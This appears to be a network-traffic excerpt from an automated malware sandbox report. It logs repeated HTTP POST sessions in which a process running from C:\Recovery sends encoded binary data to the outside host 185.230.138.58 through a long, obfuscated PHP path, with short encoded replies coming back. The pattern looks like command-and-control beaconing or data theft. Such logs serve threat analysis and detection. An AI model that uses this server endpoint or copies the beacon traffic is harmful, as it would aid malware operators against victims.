                                                                                                                                        Data Ascii: W_Z\_@QQ[YQVY\XPV^]XZZ[H[VBZT^Y]\[Q^_YR^GUUQUR_EWTY]ARTZR]WZQYZ^PW\Z_]RZ]_\X[T_VVX]SQAZZS\X]\^\T]VFRWT]_Z[GX[QXWXGTUZU]S_]X[[]Y]\Z[QT]XZ]X_VPW\SZ\P^P[Q[Z]X\[]UW\Q\XTWPVT_P^XZVUFXZT^^UX!/2$#/%<&==2W4&]*,$[29[<9<'$45&*'^& X/0
                                                                                                                                        Dec 21, 2024 10:08:40.988563061 CET25INHTTP/1.1 100 Continue
                                                                                                                                        Dec 21, 2024 10:08:41.228382111 CET200INHTTP/1.1 200 OK
                                                                                                                                        Server: nginx
                                                                                                                                        Date: Sat, 21 Dec 2024 09:08:40 GMT
                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                        Connection: keep-alive
                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                        Data Raw: 34 0d 0a 33 57 5c 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                                        Data Ascii: 43W\T0


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        60192.168.2.449893185.230.138.58806268C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        Dec 21, 2024 10:08:41.474030972 CET425OUTPOST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1
                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                                                        Host: 185.230.138.58
                                                                                                                                        Content-Length: 1008
                                                                                                                                        Expect: 100-continue
                                                                                                                                        Dec 21, 2024 10:08:41.826452971 CET1008OUTData Raw: 52 57 5f 5c 5f 48 54 54 5b 59 51 56 59 5a 58 5f 56 5a 5d 57 5a 5b 5b 44 5b 56 42 5a 54 5e 59 5d 5c 5b 51 5e 5f 59 52 5e 47 55 55 51 55 52 5f 45 57 54 59 5d 41 52 54 5a 52 5d 57 5a 51 59 5a 5e 50 57 5c 5a 5f 5d 52 5a 5d 5f 5c 58 5b 54 5f 56 56 58
                                                                                                                                        Data Ascii: RW_\_HTT[YQVYZX_VZ]WZ[[D[VBZT^Y]\[Q^_YR^GUUQUR_EWTY]ARTZR]WZQYZ^PW\Z_]RZ]_\X[T_VVX]SQAZZS\X]\^\T]VFRWT]_Z[GX[QXWXGTUZU]S_]X[[]Y]\Z[QT]XZ]X_VPW\SZ\P^P[Q[Z]X\[]UW\Q\XTWPVT_P^XZVUFXZT^^UX"-1# /+2Z!)>.U =*Z*/%%[(#S0?$Q%&*'^& X/
                                                                                                                                        Dec 21, 2024 10:08:42.720627069 CET25INHTTP/1.1 100 Continue
                                                                                                                                        Dec 21, 2024 10:08:42.956352949 CET200INHTTP/1.1 200 OK
                                                                                                                                        Server: nginx
                                                                                                                                        Date: Sat, 21 Dec 2024 09:08:42 GMT
                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                        Connection: keep-alive
                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                        Data Raw: 34 0d 0a 33 57 5c 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                                        Data Ascii: 43W\T0


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        61192.168.2.449899185.230.138.58806268C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        Dec 21, 2024 10:08:43.216661930 CET449OUTPOST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1
                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                                                        Host: 185.230.138.58
                                                                                                                                        Content-Length: 1012
                                                                                                                                        Expect: 100-continue
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Dec 21, 2024 10:08:43.586808920 CET1012OUTData Raw: 52 52 5f 5a 5a 47 51 51 5b 59 51 56 59 5c 58 5a 56 5f 5d 56 5a 5e 5b 47 5b 56 42 5a 54 5e 59 5d 5c 5b 51 5e 5f 59 52 5e 47 55 55 51 55 52 5f 45 57 54 59 5d 41 52 54 5a 52 5d 57 5a 51 59 5a 5e 50 57 5c 5a 5f 5d 52 5a 5d 5f 5c 58 5b 54 5f 56 56 58
                                                                                                                                        Data Ascii: RR_ZZGQQ[YQVY\XZV_]VZ^[G[VBZT^Y]\[Q^_YR^GUUQUR_EWTY]ARTZR]WZQYZ^PW\Z_]RZ]_\X[T_VVX]SQAZZS\X]\^\T]VFRWT]_Z[GX[QXWXGTUZU]S_]X[[]Y]\Z[QT]XZ]X_VPW\SZ\P^P[Q[Z]X\[]UW\Q\XTWPVT_P^XZVUFXZT^^UX!820 ,/X&<.=>6U :*?&^=Y+:,$<'7_3*'^& X/0
                                                                                                                                        Dec 21, 2024 10:08:44.461427927 CET25INHTTP/1.1 100 Continue
                                                                                                                                        Dec 21, 2024 10:08:44.696238995 CET200INHTTP/1.1 200 OK
                                                                                                                                        Server: nginx
                                                                                                                                        Date: Sat, 21 Dec 2024 09:08:44 GMT
                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                        Connection: keep-alive
                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                        Data Raw: 34 0d 0a 33 57 5c 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                                        Data Ascii: 43W\T0


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        62192.168.2.449904185.230.138.58806268C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        Dec 21, 2024 10:08:44.944487095 CET449OUTPOST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1
                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                                                        Host: 185.230.138.58
                                                                                                                                        Content-Length: 1012
                                                                                                                                        Expect: 100-continue
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Dec 21, 2024 10:08:45.295756102 CET1012OUTData Raw: 52 52 5f 5d 5f 44 51 54 5b 59 51 56 59 5e 58 5d 56 5f 5d 59 5a 5a 5b 49 5b 56 42 5a 54 5e 59 5d 5c 5b 51 5e 5f 59 52 5e 47 55 55 51 55 52 5f 45 57 54 59 5d 41 52 54 5a 52 5d 57 5a 51 59 5a 5e 50 57 5c 5a 5f 5d 52 5a 5d 5f 5c 58 5b 54 5f 56 56 58
                                                                                                                                        Data Ascii: RR_]_DQT[YQVY^X]V_]YZZ[I[VBZT^Y]\[Q^_YR^GUUQUR_EWTY]ARTZR]WZQYZ^PW\Z_]RZ]_\X[T_VVX]SQAZZS\X]\^\T]VFRWT]_Z[GX[QXWXGTUZU]S_]X[[]Y]\Z[QT]XZ]X_VPW\SZ\P^P[Q[Z]X\[]UW\Q\XTWPVT_P^XZVUFXZT^^UX!C,(7Z+[29)=- .^=X%&))03.$&'"$'^& X/8
                                                                                                                                        Dec 21, 2024 10:08:46.190687895 CET25INHTTP/1.1 100 Continue


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        63192.168.2.449910185.230.138.58806268C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        Dec 21, 2024 10:08:46.311660051 CET449OUTPOST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1
                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                                                        Host: 185.230.138.58
                                                                                                                                        Content-Length: 1892
                                                                                                                                        Expect: 100-continue
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Dec 21, 2024 10:08:46.670362949 CET1892OUTData Raw: 57 5f 5f 50 5f 49 54 56 5b 59 51 56 59 52 58 5e 56 52 5d 5b 5a 5c 5b 49 5b 56 42 5a 54 5e 59 5d 5c 5b 51 5e 5f 59 52 5e 47 55 55 51 55 52 5f 45 57 54 59 5d 41 52 54 5a 52 5d 57 5a 51 59 5a 5e 50 57 5c 5a 5f 5d 52 5a 5d 5f 5c 58 5b 54 5f 56 56 58
                                                                                                                                        Data Ascii: W__P_ITV[YQVYRX^VR][Z\[I[VBZT^Y]\[Q^_YR^GUUQUR_EWTY]ARTZR]WZQYZ^PW\Z_]RZ]_\X[T_VVX]SQAZZS\X]\^\T]VFRWT]_Z[GX[QXWXGTUZU]S_]X[[]Y]\Z[QT]XZ]X_VPW\SZ\P^P[Q[Z]X\[]UW\Q\XTWPVT_P^XZVUFXZT^^UX!;1,Y#4&6Z(=2U 6_)?\2&?94'(^&45$'^& X/
                                                                                                                                        Dec 21, 2024 10:08:47.494518042 CET25INHTTP/1.1 100 Continue
                                                                                                                                        Dec 21, 2024 10:08:47.728415012 CET349INHTTP/1.1 200 OK
                                                                                                                                        Server: nginx
                                                                                                                                        Date: Sat, 21 Dec 2024 09:08:47 GMT
                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                        Connection: keep-alive
                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                        Data Raw: 39 38 0d 0a 01 1f 25 10 21 35 27 1f 32 04 27 56 33 07 3d 05 3c 3e 06 06 33 3c 31 41 37 0a 2b 01 28 2f 33 5c 27 2e 26 1b 27 5a 28 56 3c 30 30 05 2e 1a 20 46 04 1c 20 04 3f 0d 3d 0a 2a 06 2c 15 2d 28 25 13 28 54 2a 5c 23 3f 3d 12 37 07 26 5c 23 21 25 17 2b 39 21 08 29 34 24 5b 3a 00 22 5d 20 2a 23 56 0b 1f 39 53 3e 20 21 06 26 27 20 58 31 09 32 51 34 18 24 0b 22 0c 2c 0c 36 2e 3c 04 31 3b 36 1f 21 01 23 0b 3d 3c 2d 03 31 00 38 54 2e 17 26 52 20 0c 29 50 05 35 57 52 0d 0a 30 0d 0a 0d 0a
                                                                                                                                        Data Ascii: 98%!5'2'V3=<>3<1A7+(/3\'.&'Z(V<00. F ?=*,-(%(T*\#?=7&\#!%+9!)4$[:"] *#V9S> !&' X12Q4$",6.<1;6!#=<-18T.&R )P5WR0


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        64192.168.2.449911185.230.138.58806268C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        Dec 21, 2024 10:08:46.522672892 CET449OUTPOST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1
                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                                                        Host: 185.230.138.58
                                                                                                                                        Content-Length: 1012
                                                                                                                                        Expect: 100-continue
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Dec 21, 2024 10:08:46.873271942 CET1012OUTData Raw: 57 51 5f 51 5f 48 51 54 5b 59 51 56 59 52 58 5f 56 59 5d 5d 5a 5c 5b 44 5b 56 42 5a 54 5e 59 5d 5c 5b 51 5e 5f 59 52 5e 47 55 55 51 55 52 5f 45 57 54 59 5d 41 52 54 5a 52 5d 57 5a 51 59 5a 5e 50 57 5c 5a 5f 5d 52 5a 5d 5f 5c 58 5b 54 5f 56 56 58
                                                                                                                                        Data Ascii: WQ_Q_HQT[YQVYRX_VY]]Z\[D[VBZT^Y]\[Q^_YR^GUUQUR_EWTY]ARTZR]WZQYZ^PW\Z_]RZ]_\X[T_VVX]SQAZZS\X]\^\T]VFRWT]_Z[GX[QXWXGTUZU]S_]X[[]Y]\Z[QT]XZ]X_VPW\SZ\P^P[Q[Z]X\[]UW\Q\XTWPVT_P^XZVUFXZT^^UX!C8!<X7'X&,.X))#X"\)/4';!++R''7&Y3:'^& X/
                                                                                                                                        Dec 21, 2024 10:08:47.765808105 CET25INHTTP/1.1 100 Continue
                                                                                                                                        Dec 21, 2024 10:08:48.000364065 CET200INHTTP/1.1 200 OK
                                                                                                                                        Server: nginx
                                                                                                                                        Date: Sat, 21 Dec 2024 09:08:47 GMT
                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                        Connection: keep-alive
                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                        Data Raw: 34 0d 0a 33 57 5c 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                                        Data Ascii: 43W\T0


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        65192.168.2.449914185.230.138.58806268C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        Dec 21, 2024 10:08:48.241193056 CET425OUTPOST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1
                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                                                        Host: 185.230.138.58
                                                                                                                                        Content-Length: 1012
                                                                                                                                        Expect: 100-continue
                                                                                                                                        Dec 21, 2024 10:08:48.592114925 CET1012OUTData Raw: 57 54 5f 51 5a 40 51 5f 5b 59 51 56 59 5d 58 5d 56 53 5d 5e 5a 5c 5b 47 5b 56 42 5a 54 5e 59 5d 5c 5b 51 5e 5f 59 52 5e 47 55 55 51 55 52 5f 45 57 54 59 5d 41 52 54 5a 52 5d 57 5a 51 59 5a 5e 50 57 5c 5a 5f 5d 52 5a 5d 5f 5c 58 5b 54 5f 56 56 58
                                                                                                                                        Data Ascii: WT_QZ@Q_[YQVY]X]VS]^Z\[G[VBZT^Y]\[Q^_YR^GUUQUR_EWTY]ARTZR]WZQYZ^PW\Z_]RZ]_\X[T_VVX]SQAZZS\X]\^\T]VFRWT]_Z[GX[QXWXGTUZU]S_]X[[]Y]\Z[QT]XZ]X_VPW\SZ\P^P[Q[Z]X\[]UW\Q\XTWPVT_P^XZVUFXZT^^UX"8287$1Y):S7>)Y;&9\?_#S$0X&73:'^& X/
                                                                                                                                        Dec 21, 2024 10:08:49.485673904 CET25INHTTP/1.1 100 Continue
                                                                                                                                        Dec 21, 2024 10:08:49.720333099 CET200INHTTP/1.1 200 OK
                                                                                                                                        Server: nginx
                                                                                                                                        Date: Sat, 21 Dec 2024 09:08:49 GMT
                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                        Connection: keep-alive
                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                        Data Raw: 34 0d 0a 33 57 5c 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                                        Data Ascii: 43W\T0


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        66192.168.2.449919185.230.138.58806268C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        Dec 21, 2024 10:08:49.961095095 CET449OUTPOST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1
                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                                                        Host: 185.230.138.58
                                                                                                                                        Content-Length: 1012
                                                                                                                                        Expect: 100-continue
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Dec 21, 2024 10:08:50.311019897 CET1012OUTData Raw: 52 53 5f 5c 5f 41 51 53 5b 59 51 56 59 52 58 5a 56 59 5d 56 5a 50 5b 48 5b 56 42 5a 54 5e 59 5d 5c 5b 51 5e 5f 59 52 5e 47 55 55 51 55 52 5f 45 57 54 59 5d 41 52 54 5a 52 5d 57 5a 51 59 5a 5e 50 57 5c 5a 5f 5d 52 5a 5d 5f 5c 58 5b 54 5f 56 56 58
                                                                                                                                        Data Ascii: RS_\_AQS[YQVYRXZVY]VZP[H[VBZT^Y]\[Q^_YR^GUUQUR_EWTY]ARTZR]WZQYZ^PW\Z_]RZ]_\X[T_VVX]SQAZZS\X]\^\T]VFRWT]_Z[GX[QXWXGTUZU]S_]X[[]Y]\Z[QT]XZ]X_VPW\SZ\P^P[Q[Z]X\[]UW\Q\XTWPVT_P^XZVUFXZT^^UX!B,"X#<?^1,-(>6V4X"\=<18.(97'.'3'=''^& X/
                                                                                                                                        Dec 21, 2024 10:08:51.223850012 CET25INHTTP/1.1 100 Continue
                                                                                                                                        Dec 21, 2024 10:08:51.456626892 CET200INHTTP/1.1 200 OK
                                                                                                                                        Server: nginx
                                                                                                                                        Date: Sat, 21 Dec 2024 09:08:51 GMT
                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                        Connection: keep-alive
                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                        Data Raw: 34 0d 0a 33 57 5c 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                                        Data Ascii: 43W\T0


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        67192.168.2.449924185.230.138.58806268C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        Dec 21, 2024 10:08:51.693104029 CET449OUTPOST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1
                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                                                        Host: 185.230.138.58
                                                                                                                                        Content-Length: 1012
                                                                                                                                        Expect: 100-continue
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Dec 21, 2024 10:08:52.045223951 CET1012OUTData Raw: 52 53 5f 58 5a 45 54 52 5b 59 51 56 59 5e 58 51 56 53 5d 5d 5a 5c 5b 47 5b 56 42 5a 54 5e 59 5d 5c 5b 51 5e 5f 59 52 5e 47 55 55 51 55 52 5f 45 57 54 59 5d 41 52 54 5a 52 5d 57 5a 51 59 5a 5e 50 57 5c 5a 5f 5d 52 5a 5d 5f 5c 58 5b 54 5f 56 56 58
                                                                                                                                        Data Ascii: RS_XZETR[YQVY^XQVS]]Z\[G[VBZT^Y]\[Q^_YR^GUUQUR_EWTY]ARTZR]WZQYZ^PW\Z_]RZ]_\X[T_VVX]SQAZZS\X]\^\T]VFRWT]_Z[GX[QXWXGTUZU]S_]X[[]Y]\Z[QT]XZ]X_VPW\SZ\P^P[Q[Z]X\[]UW\Q\XTWPVT_P^XZVUFXZT^^UX!B/27;Z$<.Y=.*T4=9*<<X&8&+*00=,_$73'^& X/8


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        68192.168.2.449930185.230.138.58806268C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        Dec 21, 2024 10:08:52.853601933 CET449OUTPOST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1
                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                                                        Host: 185.230.138.58
                                                                                                                                        Content-Length: 1892
                                                                                                                                        Expect: 100-continue
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Dec 21, 2024 10:08:53.201668024 CET1892OUTData Raw: 52 53 5f 5b 5a 42 54 55 5b 59 51 56 59 5b 58 5f 56 58 5d 5f 5a 5c 5b 44 5b 56 42 5a 54 5e 59 5d 5c 5b 51 5e 5f 59 52 5e 47 55 55 51 55 52 5f 45 57 54 59 5d 41 52 54 5a 52 5d 57 5a 51 59 5a 5e 50 57 5c 5a 5f 5d 52 5a 5d 5f 5c 58 5b 54 5f 56 56 58
                                                                                                                                        Data Ascii: RS_[ZBTU[YQVY[X_VX]_Z\[D[VBZT^Y]\[Q^_YR^GUUQUR_EWTY]ARTZR]WZQYZ^PW\Z_]RZ]_\X[T_VVX]SQAZZS\X]\^\T]VFRWT]_Z[GX[QXWXGTUZU]S_]X[[]Y]\Z[QT]XZ]X_VPW\SZ\P^P[Q[Z]X\[]UW\Q\XTWPVT_P^XZVUFXZT^^UX",!8#??X%<>>W#))<X1;)\?9W',]$Q)$:'^& X/,
                                                                                                                                        Dec 21, 2024 10:08:54.097388983 CET25INHTTP/1.1 100 Continue
                                                                                                                                        Dec 21, 2024 10:08:54.332354069 CET349INHTTP/1.1 200 OK
                                                                                                                                        Server: nginx
                                                                                                                                        Date: Sat, 21 Dec 2024 09:08:53 GMT
                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                        Connection: keep-alive
                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                        Data Raw: 39 38 0d 0a 01 1f 26 04 21 0b 27 57 27 3d 24 0d 24 00 32 12 3f 2d 3b 5b 24 3f 2e 1b 23 1d 3c 16 3d 01 09 59 30 3e 35 05 24 5a 28 10 28 56 20 05 2d 20 20 46 04 1c 23 59 28 23 04 1a 29 5e 34 5d 2d 28 36 06 3c 32 08 5d 35 02 35 58 23 2d 36 5a 22 31 39 51 3c 39 21 0e 29 34 3f 01 2f 2e 3e 5c 20 2a 23 56 0b 1f 3a 0c 3d 30 3a 58 27 19 1a 58 26 0e 2d 09 20 26 2f 53 21 0b 37 55 23 3d 05 5a 25 5e 3a 59 21 2b 20 54 3e 11 25 07 24 39 28 56 2c 3d 26 52 20 0c 29 50 05 35 57 52 0d 0a 30 0d 0a 0d 0a
                                                                                                                                        Data Ascii: 98&!'W'=$$2?-;[$?.#<=Y0>5$Z((V - F#Y(#)^4]-(6<2]55X#-6Z"19Q<9!)4?/.>\ *#V:=0:X'X&- &/S!7U#=Z%^:Y!+ T>%$9(V,=&R )P5WR0


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        69192.168.2.449931185.230.138.58806268C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        Dec 21, 2024 10:08:52.980463028 CET449OUTPOST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1
                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                                                        Host: 185.230.138.58
                                                                                                                                        Content-Length: 1012
                                                                                                                                        Expect: 100-continue
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Dec 21, 2024 10:08:53.327822924 CET1012OUTData Raw: 57 53 5a 5a 5a 45 51 5f 5b 59 51 56 59 5f 58 58 56 5c 5d 5a 5a 5a 5b 49 5b 56 42 5a 54 5e 59 5d 5c 5b 51 5e 5f 59 52 5e 47 55 55 51 55 52 5f 45 57 54 59 5d 41 52 54 5a 52 5d 57 5a 51 59 5a 5e 50 57 5c 5a 5f 5d 52 5a 5d 5f 5c 58 5b 54 5f 56 56 58
                                                                                                                                        Data Ascii: WSZZZEQ_[YQVY_XXV\]ZZZ[I[VBZT^Y]\[Q^_YR^GUUQUR_EWTY]ARTZR]WZQYZ^PW\Z_]RZ]_\X[T_VVX]SQAZZS\X]\^\T]VFRWT]_Z[GX[QXWXGTUZU]S_]X[[]Y]\Z[QT]XZ]X_VPW\SZ\P^P[Q[Z]X\[]UW\Q\XTWPVT_P^XZVUFXZT^^UX";2(Y#$&"X(.%#>+<?%6?S$;'4:0'^& X/<
                                                                                                                                        Dec 21, 2024 10:08:54.240731955 CET25INHTTP/1.1 100 Continue
                                                                                                                                        Dec 21, 2024 10:08:54.483037949 CET200INHTTP/1.1 200 OK
                                                                                                                                        Server: nginx
                                                                                                                                        Date: Sat, 21 Dec 2024 09:08:54 GMT
                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                        Connection: keep-alive
                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                        Data Raw: 34 0d 0a 33 57 5c 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                                        Data Ascii: 43W\T0


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        70192.168.2.449934185.230.138.58806268C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        Dec 21, 2024 10:08:54.740817070 CET425OUTPOST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1
                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                                                        Host: 185.230.138.58
                                                                                                                                        Content-Length: 1012
                                                                                                                                        Expect: 100-continue
                                                                                                                                        Dec 21, 2024 10:08:55.115104914 CET1012OUTData Raw: 57 53 5a 5f 5f 44 54 55 5b 59 51 56 59 5f 58 5c 56 59 5d 5d 5a 5d 5b 49 5b 56 42 5a 54 5e 59 5d 5c 5b 51 5e 5f 59 52 5e 47 55 55 51 55 52 5f 45 57 54 59 5d 41 52 54 5a 52 5d 57 5a 51 59 5a 5e 50 57 5c 5a 5f 5d 52 5a 5d 5f 5c 58 5b 54 5f 56 56 58
                                                                                                                                        Data Ascii: WSZ__DTU[YQVY_X\VY]]Z][I[VBZT^Y]\[Q^_YR^GUUQUR_EWTY]ARTZR]WZQYZ^PW\Z_]RZ]_\X[T_VVX]SQAZZS\X]\^\T]VFRWT]_Z[GX[QXWXGTUZU]S_]X[[]Y]\Z[QT]XZ]X_VPW\SZ\P^P[Q[Z]X\[]UW\Q\XTWPVT_P^XZVUFXZT^^UX!-2' 'X2X))4))/[2(%\?+$<$$*''^& X/<
                                                                                                                                        Dec 21, 2024 10:08:55.984854937 CET25INHTTP/1.1 100 Continue
                                                                                                                                        Dec 21, 2024 10:08:56.224602938 CET200INHTTP/1.1 200 OK
                                                                                                                                        Server: nginx
                                                                                                                                        Date: Sat, 21 Dec 2024 09:08:55 GMT
                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                        Connection: keep-alive
                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                        Data Raw: 34 0d 0a 33 57 5c 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                                        Data Ascii: 43W\T0


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        71192.168.2.449939185.230.138.58806268C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        TimestampBytes transferredDirectionData
